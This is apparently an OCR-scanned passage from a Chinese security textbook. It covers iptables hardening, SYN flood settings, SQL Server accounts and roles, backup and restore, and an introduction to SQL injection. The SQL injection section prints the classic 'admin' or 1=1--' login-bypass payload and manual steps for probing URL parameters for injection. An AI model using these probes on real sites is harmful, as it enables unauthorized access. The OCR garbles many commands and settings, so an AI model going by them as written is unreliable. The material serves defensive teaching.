-A INEUT ~ i eth0 -p tcp -m tcp -- dport 137:139 -j REJECT - - reject- with iam- port- unreachable 
-AQUTPUT - d 192.168. 101.250 - p tcp - m tcp - - dort 80 - j REJECT - - reject- with iam- port 
- unreachable 
COMMIT 
#Completed on Sat May 30 04:57:24 2009 
[roote serverl ~ ]&chkoonfig iptables on 
在 Red Hat Enterprise Linux 中 ,可 通过 Iptables 服务 的 save 命令 将 当前 的 规则 保 
存 到 文件 /etc/sysconfig/iptables 中 ,然后 再 通过 chkconfig 命令 将 Iptables 设 为 开机 自 
动 启动 。 
方法 2: 创建 可 执行 脚本 my -iptables. sh. 
[roote rh442 ~ ]#1s - 1 my- iptables.sh 
— rwxr- - r- - 1 root root 420 May 30 05:10 my- iptables.sh 
[root6 rh442 ~ ]fcat my- iptables.sh 
iptables - t filter -F 
iptables -t nat - F 
iptables - t mangle -F 
iptables - P INEUT DROP 
iptables — A INEUT - s 192.168.101.202 - j FOP 
iptables -A INEUT - i ethl -p wp -m multiport - - dports 80,443 — j ACCEPT 
iptables -A INEUT - i eth0 -p tcp -m tcp - - dport 137:139 - j REJECT 
iptables -A OUTEUT — d 192.168.101.250 - p tcp -m tcp - - dport 80 — j REJECT 
[root@ rh442 ~ ]#cat/etc/rc.local 
/root/ny- iptables.sh 
脚本 my-iptables 中 包含 了 直接 写 入 Iptables 的 操作 ,并 将 这 个 脚本 的 运行 操作 放 在 
rc. local 中 进行 以 实现 开机 自动 执行 。 
注意 ,Iptables 中 规则 的 执行 方式 为 : 由 上 至 下 顺序 执行 ,一 旦 发 现 满足 条 件 的 规则 
就 立即 执行 -j 指定 的 操作 并 退出 本 信息 包 的 处 理 过 程 。 因 此 在 设计 Iptables 规则 时 ,一 
定 要 把 握 好 各 个 包含 关系 的 先后 顺序 。 
4. 常见 网 络 攻击 预防 
1) 避免 ping 扫描 
ping 操作 是 通过 ICMP 协议 进行 的 ,因此 可 以 通过 Iptables 来 对 ICMP 协议 进行 
过 滤 。 


[root serverl ~ ]#iptables — I INPUT -p iam -j DEOP 
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由 于 要 丢弃 所 有 的 ping 操作 ,因此 最 好 将 这 些 规则 加 在 iptables 的 最 顶端 ,-I 
INPUT 后 面 没 有 加 入 数字 ,表示 在 INPUT 链 的 最 顶端 插入 规则 。 

2) 预防 DDoS( 拒 绝 服务 攻击 ) 

TE / etc/sysctl. conf 中 加 入 如 下 语句 。 

net.ipv4.tcp synoockies- 1 

net.ipv4.tcp synack retries-3 

net.ipv4.tcp syn retries- 3 

执行 命令 sysctl -p 以 激活 设置 。 

设置 tcp_syncookies 为 1 可 打开 SYN Cookie 功能 ,该 功能 可 以 防止 部 分 SYN 攻 
ili ;降低 tcp_synack_retries 及 tcp_syn_retries 的 值 对 减少 SYN 重 试 次 数 也 会 有 一 定 的 
效果 。 


4.4 课 后 体会 与 练习 


1. 思考 一 下 ,操作 系统 的 安全 有 哪些 重要 意义 ? 
2. Windows 操作 系统 加 固 的 策略 及 作用 是 什么 ? 
3. Linux 操作 系统 加 固 的 策略 及 作用 是 什么 ? 
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亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 
。 了 解数 据 库 系 统 安全 的 重要 意义 

。 查找 数据 库 系统 受 到 侵害 的 案例 ; 
。 了解 数据 库 系 统 安全 的 相关 技术 。 
< HERF EIR 

本 章 的 教学 目标 是 : 

。 了 解数 据 库 系统 安全 的 重要 意义 

。 掌握 数据 库 系统 安全 设置 的 常规 方法 
。 掌握 数据 库 备 份 及 还 原 相关 技术 。 
本 章 教学 要 点 

本 章 的 教学 要 点 包括 : 

。 数据 库 系统 安全 设置 技术 ; 

。 数据 库 系统 常见 攻击 原理 及 操作 ， 
。 教 据 库 系统 加 固 策略 。 

志 本 章 教学 建议 

本 章 内 容 采 用 案例 引导 模式 进行 教学 。 


5.1 数据 库 系统 安全 概述 


数据 库 安全 问题 是 信息 系统 安全 问题 的 一 个 子 问 题 , 数 据 库 技术 是 构建 信息 系统 的 
核心 技术 。 在 当今 开放 式 的 互联 网 时 代 , 许 多 关键 的 业务 系统 运行 在 数据 库 平 台 上 ,数据 
库 系统 中 的 数据 为 众多 用 户 所 共享 ,如 果 数 据 库 安全 无 法 保证 ,其 上 的 应 用 系统 也 会 被 非 
法 访问 或 破坏 。 近 年 来 ,基于 Web 的 应 用 程序 和 信息 系统 迅速 增加 ,使 得 数据 库 的 数据 
受到 黑客 的 攻击 和 自 改 的 风险 进一步 增加 ,造成 的 损失 也 越 来 越 大 ,数据 库 系统 的 安全 正 
变 得 越 来 越 重 要 。 


5.1.1. 数据 库 安全 定义 
数据 库 安全 的 核心 是 数据 的 安全 。 数 据 安全 是 指 防止 数据 信息 被 故意 或 偶然 的 非 授 
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权 泄 露 更 改 、 破 坏 或 使 用 数据 信息 被 非法 的 系统 控制 ,以 确保 数据 的 完整 性 、 保 密 性 、 可 
用 性 、 可 控 性 和 可 审查 型 。 

数据 库 安全 是 指数 据 库 的 任何 部 分 都 不 允许 受到 恶意 侵害 或 未 经 授权 的 存 取 或 修 
改 。 数 据 库 管理 系统 安全 性 保护 是 通过 各 种 防范 措施 ,以 防止 用 户 越权 使 用 数据 库 。 数 
据 库 系 统 中 一 般 采 用 用 户 标识 和 鉴别 . 存 取 控制 .视图 以 及 密码 存储 等 技术 进行 安全 
控制 。 


5.1.2. 数据 库 管 理 系统 的 安全 机 制 


数据 库 管理 系统 负责 管理 大 量 的 业务 数据 ,保证 其 业务 数据 的 安全 是 最 重要 的 任务 。 
一 般 大 型 数据 库 管 理 系统 都 会 提供 强大 的 安全 机 制 来 保证 数据 的 安全 。 我 们 以 SQL 
Server 2008 为 例 来 认识 数据 库 管理 系统 的 安全 机 制 。 

SQL Server 2008 的 安全 性 管理 分 为 三 个 等 级 : 操作 系统 级 .SQL Server 级 和 数据 
库 级 。 

1. 操作 系统 级 的 安全 性 

用 户 使 用 客户 机 通过 网 络 实现 对 SQL Server 服务 器 访问 时 ,首先 要 获得 操作 系统 的 
使 用 权 。SQL 可 以 直接 访问 网 络 端口 ,对 Windows 安全 体系 外 的 服务 器 及 其 数据 库 的 
访问 。 由 于 SQL 采用 了 集成 Windows 网 络 安全 性 机 制 , 使 得 OS 安全 性 提高 。 

2. SQL Server 级 的 安全 性 

这 个 级 别 的 安全 性 主要 通过 登录 账户 进行 控制 ,要 想 访问 一 个 数据 库 服务 器 ,必须 拥 
有 一 个 登录 账户 。 登 录 账 户 可 以 是 Windows 账户 或 组 ,也 可 以 是 SQL Server 的 登录 账 
户 。 用 户 登 录 时 提供 的 登录 账号 和 口令 决定 了 用 户 能 否 获 得 SQL Server 的 访问 权 及 其 
登录 后 拥有 的 具体 访问 权限 。 

3. 数据 库 级 的 安全 性 

用 户 通过 SQL Server 级 的 服务 器 安全 性 的 检验 后 ,要 访问 数据 库 对 象 ,还 要 进行 数 
据 库 级 的 安全 检验 。 这 个 级 别 的 安全 性 主要 通过 用 户 账户 进行 控制 ,要 想 访问 一 个 数据 
库 , 必 须 拥 有 该 数据 库 的 一 个 用 户 账户 身份 。 用 户 账户 是 通过 登录 账户 进行 映射 的 ,可 以 
属于 固定 的 数据 库 角色 或 自 定义 数据 库 角色 。 


5.2 SQL Server 常规 安全 设置 


5.2.1 创建 登录 账户 


SQL Server 提供 了 两 种 确认 用 户 账户 : Windows 登录 账号 和 SQL Server 登录 账 
号 。Windows 登录 账号 是 由 Windows 服务 器 来 对 登录 的 账号 进行 身份 验证 ,支持 
Windows 操作 系统 的 密码 策略 ,账号 和 密码 保存 在 Windows 操作 系统 的 账户 数据 库 中 。 
SQL Server 登录 账号 是 SQL Server 自身 负责 验证 身份 的 登录 账号 。 当 使 用 SQL Server 
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登录 账号 和 口令 连接 SQL Server 服务 器 时 ,由 SQL Server 验证 该 用 户 是 否 存在 , 且 其 口 
令 是 否 与 记录 的 口令 匹配 ,如 图 5. 1 所 示 。 


EE 连接 到 服务 器 


SÖ serverz005 


t Windows Server System 


服务 器 类 型 D) 数据 库 引擎 

服务 器 名 称 G) 

身份 验证 他 ) 
sao 
biela] 


图 5.1 SQL Server 2005 身份 验证 界面 


1. Windows 登录 账号 的 创建 
任务 : 为 SQL Server 2005 创建 名 为 DBSecurity 的 Windows 登录 账户 。 
CD 在 Windows 中 创建 一 个 名 为 DBSecurity 的 用 户 , 如 图 5. 2 所 示 。 


更 在 DIREM [Ft] 


CE Ey 


图 5.2 创建 一 个 Windows 用 户 


(2) 使 用 有 sysadmin 角色 权限 的 用 户 登录 “SQL Server 管理 控制 台 ”, 简 称 SSMS. 

G) 在 “对 象 资源 管理 器 ”中 依次 展开 “安全 性 ”节点 。 右 击 “ 登 录 名 ”在 弹出 的 快捷 菜 
单 中 单 击 “ 新 建 登录 名 ”, 弹 出 “登录 名 一 新 建 ” 对 话 框 ,如 图 5. 3 和 图 5.4 所 示 。 

G) 选择 “Windows 身份 验证 ”, 单 击 “ 搜 索 ” 按 钮 ,打开 “选择 用 户 或 组 ”对 话 框 ,如 
图 5.5 所 示 。 

(4) 在 “输入 要 选择 的 对 象 名 称 ” 文 本 框 中 输入 DBSecurity, 单 击 “ 检 查 名 称 ” 按 钮 检 
查 名 称 无 误 后 , 单 击 “ 确 定 ” 返 回 ,如 图 5.6 所 示 。 

(5) 返回 “登录 名 一 新 建 ” 对 话 框 , 单 击 “ 确 定 ” 按 钮 完成 登录 名 的 创建 。 展 开 登 录 名 
节点 ,可 查看 新 创建 的 DBSecurity 账号 ,如 图 5.7 所 示 。 
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图 5.3 登录 名 节点 
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图 5.4 新 建 登录 名 对 话 框 


选择 用 户 或 组 
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图 5.5 选择 Windows 用 户 对 话 框 
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2. SQL Server 登录 账号 的 创建 

任务 : 为 SQL Server 2005 创建 名 为 Security 的 SQL Server 登录 账户 。 

CD 在 “对 象 资源 管理 器 ”中 依次 展开 “安全 性 ”节点 。 右 击 “ 登 录 名 ”在 弹出 的 快捷 菜 
单 中 单 击 “ 新 建 登录 名 ”, 弹 出 “登录 名 一 新 建 ” 对 话 框 。 

(2) 在 “登录 名 一 新 建 ? 对 话 框 中 选择 “SQL Server 身份 验证 ”选项 ,在 “登录 名 ”文本 框 
中 输入 Security, 在 “密码 "和 “确认 密码 ”文本 框 中 输入 口令 和 确认 口令 ,如 图 5. 8 所 示 。 

(3) 单 击 “ 确 定 ” 按 钮 完成 登录 名 的 创建 。 

3. XT sa 

SQL Server 服务 器 安装 成 功 后 会 自动 创建 一 个 特殊 的 登录 账户 ,名 为 sa。sa 是 
SQL Server 账户 ,在 混合 模式 情况 下 ,sa 账户 自动 启用 。sa 拥有 最 高 管理 权限 ,可 执行 服 
务 器 范围 内 的 所 有 操作 ,用 户 不 能 更 改 它 的 属性 ,也 不 能 删除 它 。 


5.2.2 创建 数据 库 用 户 
一 个 服务 器 登录 账号 要 访问 数据 库 , 必 须 在 这 个 数据 库 内 有 数据 库 用 户 与 其 对 应 
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图 5.8 新 建 SQL Server 账户 界面 


每 个 数据 库 用 户 都 和 服务 器 登录 账户 之 间 存 在 着 一 种 映射 关系 。 

任务 : 为 Security 账户 在 Exercise 数据 库 中 创建 对 应 的 数据 库 用 户 Security。 

(1) 使 用 具有 足够 操作 权限 的 用 户 登录 SSMS, 

(2) 在 “对 象 资源 管理 器 ”中 依次 展开 “数据 库 ”>Exercise>“ 安 全 性 ”一 “用 户 ” 节 点 ， 
如 图 5.9 所 示 。 


d Cl Service Broker 
日 国 安全 性 


图 5.9 数据 库 用 户 节点 


(3) 在 图 5. 10 中 的 “用 户 ” 节 点 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “新 建 用 户 ”, 打 开 
“数据 库 用 户 一 新 建 ” 对 话 框 ,如 图 5. 10 所 示 。 
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图 5. 10 “数据 库 用 户 一 新 建 "对 话 框 


(4) 在 打开 的 “数据 库 用 户 一 新 建 ” 对 话 框 中 ,在 “用 户 名 ”文本 框 中 输入 要 创建 的 数 
据 库 用 户 名 Security( 用 户 名 可 以 与 登录 名 相同 ) ,在 登录 名 文本 框 中 输入 与 该 用 户 名 对 
应 的 登录 账号 ,也 可 以 通过 单 击 “ 浏 览 ” 按 钮 来 打开 “选择 登录 名 ”对 话 框 来 选择 。 

(5) 设置 好 选项 后 , 单 击 “ 确 定 ” 按 钮 ,完成 数据 库 用户 Security 的 创建 。 


5.2.3 角色 管理 


角色 是 一 种 权限 机 制 ,可 以 方便 管理 员 对 用 户 权限 的 集中 管理 ,大 大 减少 管理 员 的 工 
作 量 。SQL Server 管理 者 可 以 将 用 户 设置 为 某 一 角色 ,这 样 只 要 对 角色 进行 权限 设置 便 
可 以 实现 对 所 有 用 户 权 限 的 设置 。SQL Server 提供 服务 
器 角色 和 数据 库 角 色 。 

1. 将 登录 名 映射 到 服务 器 角色 

任务 : 使 用 SSMS 将 Security 映射 到 服务 器 角色 
sysadmin 中 。 

(1) 使 用 具有 sysadmin 角色 权限 的 账户 登录 到 


E [fj YYY-TAF5680735A (SQL Server 9.0.30| 
田 国 数据 库 


setupadnin 


SSMS, 在 对 象 资源 管理 器 中 ,依次 展开 “安全 性 "和 "服务 | Ree 
器 角色 ”, 如 图 5. 11 所 示 。 za pamut 
(2) 在 sysadmin 服务 器 角色 上 右 击 ,在 弹出 的 快捷 菜单 umet 


中 选择 “属性 ”, 弹 出 “服务 器 角色 属性 ”对 话 框 ,如 图 5.12 图 5.11 服务 器 角色 
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图 5. 12 “服务 器 角色 属性 ”对 话 框 


(3) 在 图 5. 12 中 显示 的 “服务 器 角色 属性 ”对 话 框 中 单 击 “ 添 加 ”按钮 ,将 弹出 “选择 
登录 名 ”对 话 框 ,如 图 5.13 所 示 。 


DENERA 


输入 要 选择 的 对 象 名 称 TD (D 
1 


图 5. 13 “选择 登录 名 ”对 话 框 


(4) 单 击 “ 浏 览 ” 按 钮 ,会 弹出 “查找 对 象 " 对 话 框 ,如 图 5. 14 所 示 。 选 中 Security 登 
录 名 前 的 复 选 框 , 单 击 “按钮 ”, 完 成 角色 映射 。 

2. 为 用 户 名 分 配 数据 库 角色 

数据 库 角色 是 为 某 一 用 户 或 某 一 组 用 户 授予 不 同 级 别 的 管理 或 访问 数据 库 以 及 数据 
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图 5. 14 “查找 对 象 " 对 话 框 


库 对 象 的 权限 ,这 些 权限 是 数据 库 专 有 的 ,并 且 还 可 以 给 一 个 用 户 授予 属于 同一 数据 库 的 
多 个 角色 。SQL Server 提供 了 两 种 数据 库 角色 : 固定 数据 库 角 色 和 用 户 自 定义 数据 库 
角色 。 

任务 : 将 数据 库 用 户 Security 添加 到 Exercise 数据 库 的 db. owner 角色 中 。 

CD 在 “对 象 资源 管理 器 ”中 依次 展开 “数据 库 ” 一 Exercise 一 “安全 性 ”一 “角色 ” 节 
点 一 数据库 角 色 ” 节 点 ,如 图 5. 15 所 示 。 


日 [f mm-TAF5680735A (SQL Server 9.0.3042 - YYY-TAFSBOT3SA| 
日 向 数据 库 
Ca Ri 
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图 5.15 数据 库 用 户 角色 
(2) 右 击 db owner 角色 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,打开 “数据 库 角色 属 
性 一 db_owner” 对 话 框 。 


G) 在 “数据 库 角色 属性 一 db_owner” 对 话 框 中 , 单 击 “ 添 加 ”按钮 ,打开 “选择 数据 用 
户 或 角色 ”对 话 框 如 图 5. 16 所 示 . 单 击 “ 浏 览 ” 按 钮 ,打开 “查找 对 象 ” 对 话 框 。 
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输入 要 选择 的 对 象 名 称 TAD H: 


图 5.16 “选择 数据 库 用 户 或 角色 ”对 话 框 


(4) 选择 “[Security]” 数 据 库 用 户 , 单 击 “ 确 定 ” 按 钮 角色 指定 ,如 图 5. 17 所 示 。 


5.17 “ 查找 对 象 "对 话 框 


5.3 数据 安全 保障 一 一 备份 及 恢复 


5.3.1 数据 备份 简介 


数据 备份 (Data Backup) 与 恢复 是 SQL Server 非常 重要 的 保护 功能 ,是 防止 意外 故 
障 的 必 备 措施 。 数 据 备份 是 指 为 防止 系统 出 现 操作 失误 或 系统 故障 导致 数据 丢失 ,而 将 
全 系统 或 部 分 数据 从 应 用 主机 中 复制 ( 转 存 ) 到 其 他 存储 介质 上 的 功能 。 其 目的 是 为 了 系 
统 数据 崩溃 时 能 够 快速 地 恢复 数据 ,使 系统 迅速 恢复 运行 。 

1. 备份 类 型 

SQL Server 备份 一 般 可 分 为 四 种 类 型 : 数据 库 备份 .差异 备份 .事务 日 志 备份 及 文 
件 和 文件 组 备份 。 
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2. 备份 设备 

SQL Server 将 数据 库 、 事 务 日 志和 文件 备份 到 备份 设备 上 。 在 创建 数据 库 备 份 时 ， 
必须 选择 备份 设置 。SQL Server 使 用 物理 设备 名 称 或 逻辑 备份 名 称 标识 备份 设备 。 

D 物理 备份 设备 是 指 磁带 机 或 操作 系统 提供 的 磁盘 文件 。 如, C: \ Backup\ 


Exercise. bak, 


(2) 逻辑 备份 设备 是 用 户 给 物理 设备 定义 的 一 个 别名 。 


5.3.2 备份 数据 库 


1. 创建 备份 设备 

任务 : 创建 一 个 名 为 Backup 的 备份 设备 ,用 于 对 数据 库 的 备份 。 

(1) 登录 SSMS, 在 “对 象 资源 管理 器 ”中 展开 “服务 器 对 象 ” 节 。 在 “备份 设备 ”节点 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “新 建 备份 设备 ”选项 。 弹 出 “备份 设备 ”对 话 框 ,如 图 5. 18 所 示 。 


SB Wr-TAFS8B0735A (SQL Server 9.0.3042 - WI-TAFS6BO735A\, 
据 | 


图 5.18 “备份 设备 ”节点 


(2) 在 “备份 设备 "对话 框 的 设备 名 称 文本 框 中 输入 设备 名 Backup, 如 果 需 要 重新 确 
定 备份 存储 位 置 , 则 单 击 “ 目 标 ” 一 “文件 ”后 的 浏览 按钮 重新 选择 保存 路 径 ,如 图 5. 19 
所 示 。 


rera Files\Niorosof: SQ. Server MISSqL SANSAL Backup Deckug. bak 


5.19 “备份 设备 ”对 话 框 
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(3) 单 击 图 5. 19 中 的 “确定 ”按钮 完成 备份 设备 Backup 的 创建 。 

2. 执行 数据 库 备 份 

任务 : 将 Exercise 数据 库 完整 备份 到 Backup 设备 。 

CD 登录 SSMS, 在 "对象 资源 管理 器 展开“ 数据库” 节点。 

(2) 右键 单 击 Exercise 数据 库 , 在 弹出 的 快捷 菜单 中 选择 “任务 ”一 “备份 ”选项 ,打开 
“备份 数据 库 ” 对 话 框 。 

(3) 选择 “备份 类 型 ”, 填 写 备份 名 称 , 如 图 5. 20 所 示 。 


E 备份 数据 库 - Exercise 
AG 


ET P 
oso [ 


PTATSSBOTISA\Wdnini strator 


a smsem 


图 5.20 “备份 数据 库 ” 对 话 框 


(4) 选择 备份 目标 。 默 认 情 况 下 备份 在 SQL Server 所 在 的 Backup 目录 下 ,如 图 5. 20 
所 示 。 单 击 “ 删 除 ” 按 钮 ,删除 默认 被 分 目录 。 

(5) 单 击 “ 添 加 ”按钮 ,弹出 “选择 备份 目标 ”对 话 框 ,选择 所 指定 的 Backup 备份 设备 ， 
单 击 “ 确 定 ” 按 钮 ,如 图 5.21 所 示 。 

(6) 返回 “备份 数据 库 ” 界 面 , 单 击 “ 确 定 ” 按 钮 ,完成 对 Exercise 数据 库 的 完整 备份 ， 
如 图 5. 22 所 示 。 


5.3.3 恢复 数据 库 


通过 备份 ,管理 员 可 以 保存 SQL Server 数据 库 及 其 对 象 的 特定 状态 ,在 系统 出 现 故 
障 时 ,管理 员 可 以 将 备份 到 存储 介质 上 的 数据 再 恢复 (还 原 ) 到 计算 机 系统 中 ,将 数据 库 恢 
复 到 以 前 的 正常 状态 ,将 损失 降 至 最 小 。 数 据 恢复 与 数据 备份 是 一 个 逆 过 程 ,包括 整个 数 
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E 选择 各 份 目标 
选择 文件 或 备份 设备 作为 备份 目标 。 您 可 以 为 常用 文件 凶 建 备份 设备 


磁盘 上 的 目标 

加 文件 名 @@): 
C:\Program Files\Microsoft SQL Server MISSQL SMISSQLWBacku 
OME: 


Backup 


5.21 “选择 备份 目标 ?对话 框 


D 备份 数据 库 - Exercise 


Lid 
FI TAFSBBOT3SA 


iem 
NYY-TAESSBOT3SÀ dinis strator 


- sius 


图 5.22 “备份 数据 库 ” 对 话 框 


据 库 系统 的 恢复 。 由 于 数据 恢复 直接 关系 到 系统 在 经 过 故障 后 能 否 迅速 恢复 正常 运行 ， 
所 以 ,数据 恢复 在 整个 数据 安全 保护 也 是 极为 重要 。 

任务 : 使 用 SSMS 对 完整 备份 的 数据 库 Exercise 进行 还 原 。 

CD 启动 SSMS, 登 录 数 据 库 服 务 器 ,在 “对 象 资源 管理 器 ”中 展开 数据 库 节 点 。 

(2) 右 击 “数据 库 ” 节 点 ,在 弹出 的 快捷 菜单 中 选择 “还 原 数据 库 ” 选 项 ,打开 “还 原 数 
据 库 ”对 话 框 ,如 图 5. 23 所 示 。 


(3) 在 “目标 数据 库 ” 项 选择 Exercise 数据 库 。 


(4) 选择 “ 源 设备 ”选项 , 单 击 该 选项 的 浏览 按钮 ,打开 “ 


所 示 。 


guz qw 
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指定 备份 ”对 话 框 ,如 图 5. 24 


ERORE 


JUISEHTERRUTESREED EIER ANDEESR. 


ESSER O | 


ET mire 


还 原 的 源 


REETTA. 


C se O.: 


pass: [ 


dum 
rri TAPSODOTISA 


mm 
WHSTAFSSIDTSSA dni stator 
a ztisas 


JRRIETIERECRÓHR QD. 
IER Em EH GE RN GEM CE 第 一 个 LSN RETON KSAN 完整 LSN AEAN 


图 5.23 “还 原 数 据 库 ” 对 话 框 


指定 还 原 操作 的 备份 媒体 及 其 位 置 。 


LLLI 


备份 位 置 D: 


图 5.24 “指定 备份 ”对话 框 


(5) 在 “指定 备份 "对话 框 中 ,打开 “备份 媒体 ”下 拉 列 表 , 选 择 “ 备 份 设备 ”, 单 击 “ 添 
加 ”按钮 ,选择 备份 设备 Backup。 结 果 如 图 5.25 所 示 , 单 击 “ 确 定 ” 返 回 “ 还 原 数 据 库 ”对 


话 框 。 


(6) 勾 选 “选择 用 于 还 原 的 备份 集 ” 选 项 中 相应 的 选项 , 单 击 “ 确 定 ” 按 钮 ,完成 还 原 ， 


如 图 5. 26 所 示 。 
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指定 还 原 操作 的 备份 媒体 及 其 位 置 。 


Saws: | 备份 设备 ~ 


备份 位 置 D 


图 5.25 指定 备份 设备 


P ERREF - Exercise 
E bid 


ERORE 一 


GUEREHERIERISEIISS UR AME AR. 


Bf D. 
目标 时 间 点 D 
ERES 


qWETGHeRG Ram RE. 
OBRERO. 

[ID [ar 
RETER QD. 


ER em ut SE 
Beda SES R6 BEE 完整 


pss 


[n] 
ri TAFSDDOTOSA. 


mm 
VHTTAPSSIOTSSA dni strator 
3) amm 


图 5.26 勾 选 用 于 还 原 的 备份 集 


5.4 常见 攻击 一 一 SQL 注入 


大 约 在 10 秒 钟 之 内 一 个 普通 的 黑客 就 可 以 进出 一 次 数据 库 , 在 这 么 短 的 时 间 数 据 库 
管理 员 根本 不 可 能 发 现 人 侵 者 的 和 人 侵 。 因 此 ,在 数据 遭 到 破坏 很 长 时 间 后 ,许多 被 攻击 数 
据 库 的 管理 员 都 没有 注意 到 。SQL 注入 攻击 是 目前 一 种 比较 流行 的 攻击 方法 。 根 据 网 
络 安全 公司 WebCohort 关于 网 络 应 用 程序 调查 研究 报告 显示 ,有 可 能 受到 黑客 攻击 的 网 
络 应 用 程序 不 少 于 92%, 其 中 ,有 60%% 就 有 可 能 遭受 SQL 注入 攻击 。OWASP 公布 的 
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“2010 十 大 应 用 安全 隐患 ?中 SQL 注入 攻击 位 列 榜首 ,本 节 着 重 讨论 SQL 注入 攻击 。 


5.4.1 SQL 注 人 攻击 原理 


1. SQL 注入 攻击 概述 

B/S(Browser/Server, 浏 览 器 /服务 器 ) 结 构 是 互联 网 兴起 后 的 一 种 网 络 结构 模式 ， 
Web 浏览 器 是 客户 端 最 主要 的 应 用 软件 。 这 种 模式 统一 客户 端 ,将 系统 功能 实现 的 核心 
部 分 集中 到 服务 器 上 ,简化 了 系统 的 开发 .维护 和 使 用 。 

目前 的 Web 应 用 中 , 绝 大 多 数 都 会 向 用 户 提供 一 个 需要 其 输入 数据 的 接口 ,然后 动 
态 地 构成 SQL 请 求 发 给 数据 库 , 用 来 进行 权限 验证 、 搜 索 和 查询 信息 等 ,如 常见 的 在 线 银 
行 应 用 和 交易 网 站 等 。 许 多 程序 员 在 编写 Web 应 用 程序 的 时 候 ,没有 对 用 户 输入 数据 的 
合法 性 进行 检查 ,导致 应 用 程序 根据 用 户 输入 的 数据 构造 SQL 语句 时 存在 安全 隐患 ,而 
SQL 注入 攻击 正 是 利用 这 一 特性 。 

SQL( 机 构 化 查询 语言 ) 是 数据 库 通信 的 通用 语言 。 每 个 数据 库 系统 都 增加 一 些 专 有 
的 功能 到 基本 ANSI SQL, SQL 注入 是 一 种 将 SQL 代码 插入 或 添加 到 用 户 的 输入 字段 
中 的 技术 。 这 些 参数 传递 给 后 台 的 SQL 服务 器 加 以 解析 执行 ,攻击 者 根据 程序 返回 的 结 
果 , 可 以 获得 某 些 他 想 得 知 的 数据 ,这 就 是 所 谓 的 SQL Injection, HI SQL iE A. SQL iE 
入 可 以 登录 或 者 接管 一 个 网 站 ,危害 极 大 ,对 此 类 攻击 的 防范 非常 重要 。 

下 面 举 一 个 简单 的 例子 ,说 明 SQL 注入 如 何 绕 过 登录 页 面 到 网 站 ,假设 一 个 网 站 有 
一 个 简单 的 登录 形式 ,如 图 5. 27 所 示 。 


D) login. html 


€ > C fi |D mm. website. com/login. asp 


Username: ] 


Password: | 


EH 


5.27 网 站 登录 界面 


此 页 面 需要 两 条 用 户 信 息 ( 用 户 名 和 密码 ) ,并 将 字段 中 的 信息 提交 到 login. asp. iX 
网 页 需要 输入 用 户 名 和 密码 ,并 将 它们 放 到 一 个 从 用 户 表 中 选择 数据 的 SQL 命令 中 。 如 
果 登 录 有 效 , 则 数据 库 将 返回 用 户 登录 页 面 ;如 果 无 效 , 则 返回 用 户 名 或 密码 错 , 请 重新 登 
录 页 面 。 

典型 的 以 admin 作为 用 户 名 、 以 smith 为 密码 的 SQL 查询 语句 如 下 。 

Select * fram users Where username- 'admin' and password- 'smith"' 

放 在 SQL 字符 串 中 的 用 户 名 和 密码 没有 任何 完整 性 检查 。 从 SQL 注入 攻击 的 角度 


看 来 ,这样 可 以 使 我 们 在 发 送 SQL 请 求 时 通过 修改 用 户 名 与 密码 值 的 输入 区 来 达到 攻击 
的 目的 。 
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本 例 中 ,攻击 者 如 果 分 别 给 username 和 password 赋值 adminor 1 二 1--' 和 'aaa', 那 么 ， 
SQL 脚本 解释 器 中 的 上 述 语句 就 会 变 为 如 下 。 


Select * fram users Where username- 'admin' or 1- 1- - ' and password- 'aaa" 


该 语句 中 进行 了 两 个 判断 ,只 要 条 件 成 立 ,就 会 执行 成 功 。 而 1—1 在 逻辑 判断 上 是 
恒 成 立 的 ,后 面 的 “一 表示 注释 , 即 后 面 所 有 的 语句 为 注释 语句 ,那么 不 需要 知道 合法 的 
用 户 名 和 密码 ,就 可 以 成 功 登录 系统 。 

2. SQL 注入 攻击 过 程 

SQL 注入 攻击 对 于 不 同 的 关系 型 数据 库 略 有 差异 ,但 基本 原理 和 攻击 过 程 大 致 相 
同 。 无 论 是 用 手工 进行 SQL 注入 攻击 .还 是 用 自动 化 的 SQL 注入 攻击 工具 ,SQL 注入 
攻击 的 一 般 流程 如 下 AR CUL E Pd sd s (EE T EYE 。 

D 寻找 注入 点 

找到 存在 SQL 注入 漏洞 的 动态 网 页 地 址 ,在 含有 传递 参数 的 动态 网 页 中 ,判断 是 否 
存在 SQL 注入 漏洞 。 一 般 来 说 ,SQL 注入 一 般 存 在 于 形 如 “http://domain-name/page. 
asp?arg 一 value” 等 带 有 参数 的 动态 网 页 中 ,一 个 动态 网 页 中 可 以 有 一 个 或 多 个 参数 , 参 
数 类 型 可 能 是 整 型 或 字符 串 型 等 。 如 果 ASP 程序 员 没 有 安全 意识 ,不 进行 必要 的 字符 过 
滤 ,存在 SQL 注入 的 可 能 性 就 非常 大 。 

经 典 查 找 方法 是 在 有 参数 传人 的 地 方 在 输入 参数 后 额外 添加 *”、“and 1 二 1” 和 “and 
1 二 2” 查 询 条 件 , 通 过 浏览 器 所 返回 的 错误 信息 来 判断 是 否 存在 SQL 注入 漏洞 。 假 设 
http://xxx. xxx. xxx /abc. asp? id—207 网 页 显示 正常 ,如 下 图 5. 28 所 示 。 


|» s& BLO hp. $|v»j[a.sm 


J 
DRMR 
DAEM BAADRENDWARZ.SAIHIATORESBGIE 
D PAR DERRATA TAARE AARAA TORRETA, NTC ERA 
B aen 药品 科普 局 开展 点 彰 栓 查 和 产品 检验 ， 员 赴 现场 进行 介 查 。 
€ BEDAE SPmRUR. HUI PUREOPRUTURBSAS EU, Pali 
J E. FE GARA TE Vo UERH ESERTR CER, EERE 
— M" gin, ERARE S HSBALISERASRES. SE 
人 ua mn. pr NN PAARA SLEAUEUEPBE( RESET 


5.28 某 动态 网 页 


网 页 中 SQL 语句 的 原貌 大 致 为 select * from 表 名 where id=1, 则 以 下 步骤 测试 
SQL 注入 漏洞 是 否 存在 。 

COD. 第 一 步 ,http://xxx. xxx. xxx /abc. asp?id 一 207( 附 加 一 个 单 引 号 ) ,此 时 网 页 中 
的 SQL 语句 变 成 了 select * from 表 名 where id 一 1 运行 异常 ,如 图 5. 29 所 示 。 

(2) 第 二 步 ,http://xxx. xxx. xxx /abc. asp? id—1 and IAA and 1—1) ,此 时 

网 页 中 的 SQL 语句 变 成 了 select * from 表 名 where id—1 and 1 王 1 ,运行 正常 ,而 且 与 原 

网 页 运行 结果 相同 ,如 图 5. 30 所 示 。 

